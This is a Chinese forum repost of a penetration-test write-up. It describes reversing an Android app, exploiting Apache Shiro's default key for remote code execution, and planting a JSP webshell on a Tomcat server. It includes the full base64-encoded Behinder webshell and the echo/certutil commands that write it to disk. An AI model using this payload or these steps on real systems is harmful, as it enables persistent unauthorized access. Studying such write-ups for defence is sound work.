安全矩阵

 找回密码
 立即注册
搜索
查看: 1903|回复: 0

APP简单逆向到getshell

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-7-1 20:06:08 | 显示全部楼层 |阅读模式
本帖最后由 luozhenni 于 2022-7-1 20:05 编辑


APP简单逆向到getshell
原文链接:APP简单逆向到getshell
1frame衡阳信安2022-07-01 01:43 发表于山东
前言
某APP渗透测试,主页就一个登录框,登录框认证调用的公司门户站的SSO单点登录,再加上长亭的waf,几乎牢不可破,常规手法都有尝试,没有什么突破点。
脱壳逆向
jadx一把梭,看看有没有什么敏感信息泄露,审源码的时候发现有爱加密加固,反射大师脱壳一把梭,得到dex文件,然后又jadx一把梭看代码(这个过程就省略了,主题不是它)。
逆向分析
大致粗略的看了一下,用的okhttp框架,有反抓包,直接hook绕过即可正常抓包,数据库密码,阿里osskey之类的也没有硬编码在app中,没有什么敏感信息可以利用,登录验证算法都是调用的单点登录,也没有什么突破点。

突破口
#1 正当没啥进展的时候,乱翻了翻基础类源码,发现BaseUrlConfig类中有一串URL,都是一个ip,但是端口不一样。
推荐一款app信息搜集工具,能主动扫描获取app中的url信息,AppInfoScanner

#2 访问链接,页面空白,由图标得知上面搭载的tomcat。

#3 然后全局搜索http://关键词,又搜到一个url(这次是域名),类似于http://xxxxx:8080/web/weixin/xxxxxx,浏览器打开看了一下,没啥东西,也是空白页面。因为url中出现weixin关键词,推测两种可能,第一种:登陆点,第二种,微信授权接口。
所以简单猜了下路径,在weixin后面加了个login,http://xxxxx:8080/web/weixin/login,发现登陆点,由于路径跟上面发现的url类似,推测它也是java的后端,直接shiro一把梭,默认key,成功rce,java后端rce一般都是system权限。。


写入webshell踩坑
RCE之后呢,当然不能只满足现状,为了方便管理,肯定得写个webshell的。
写shell,用的最多的就几种,小马传大马,手动echo写入,远程下载等方式,这里服务器不通外网,也就没法远程下载了,没有上传点,而且小马的代码量跟冰蝎差不多,就不考虑写小马了。
坑1—特殊字符转义
windows服务器写shell,常规做法无非就是echo shell内容 > shell.jsp,shell内容中肯定有特殊字符,用^转义一下就行了,但是这里目标环境是jsp,jsp马跟其他马不一样,内容多,特殊字符多,转义起来麻烦得很,我这里以写冰蝎为例,转义了半天,把所有特殊字符都转义了,先本地测试了一下,能成功写马,但是在shiro工具里就不行…估计跟编码有关,大概试了半个多小时,无果。放弃。
坑2—BASE解码报错
特殊字符多,还有一中办法是先把shell内容base64编码一下,然后在目标机上解码。cmd是有base64解码的功能的,具体可以百度certutil用法。
certutil -decode 1.txt 2.txt //1.txt解码生成2.txt。
情况还是一样的,本地测试成功,在服务器上就是解码失败,输出长度为0,箭头指向的本来是0的,我偷懒就随便找了张图 。


除此之外,什么字符拼接啊,base64一段段输入然后解码啊,全试过了,不是报错就是写不进去或者是base解码输出长度为0,大概率是目标服务器的问题,在这里浪费了大量时间。
成功写入webshell
最后咋解决的呢,最后采用的fuzz大法,把shell内容一段段base64编码上传,然后解码,一段一段的fuzz测试,看到底是那部分字符导致了base解码失败。
最后锁定了冰蝎马的最后四个字符;}%>,不加这四个字符,base64解码能正常输出内容,只要base64编码里是以这四个字符结尾,那么就解码报错。
坑3—根目录webshell不解析
成功写入webshell之后,解码也成功了,webshell地址写在了网站根目录,连接时发现报错,手动访问发现webshell直接变成了下载链接,webshell根本没解析。后来将webshell写入docs目录下才成功解析,因为docs目录是tomcat自带的说明文档目录。整理思路
1.找到了问题所在,那么就定点打击。思路是:先将除最后四个字符以外的shell内容base编码传到目标上,然后解码输出到2.jsp。
  1. echo PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KQ>1.txt
  2. certutil -decode 1.txt 2.jsp
复制代码
2.剩下的四个特殊字符经过echo语句 手动追加到2.jsp末尾
echo ^;^}^%^>>2.jsp
编辑

3.最后成功写入docs目录。附上一张连接图


结尾
这波写shell,大概耗时两个多小时,还有很多小细节没说,本地操作不报错并不代表服务器上操作不会报错,环境可能不一样,有时候还有玄学问题,在此之前我也有过shiro写shell的经历,但是那次没这么多问题,一次性base解码写shell成功,而且直接通过文件下载把webshell下载到目标中也行,每个人遇到的环境都可能不一样,最好的方法就是不断fuzz测试,找到报错的原因,然后精准打击。再补充一句…内存马注入也可以,但是任意把站弄崩,别问我怎么知道的,不到万不得已不注入内存马。
最后确认资产的时候没打偏,打到了该公司的一台其他业务的服务器上去了,如果从正面刚APP的话,就算有shiro,也没法绕waf,如果正面无法突破的话,可以尝试搜集一些app内部的敏感信息,说不定有突破口。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 23:35 , Processed in 0.013183 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表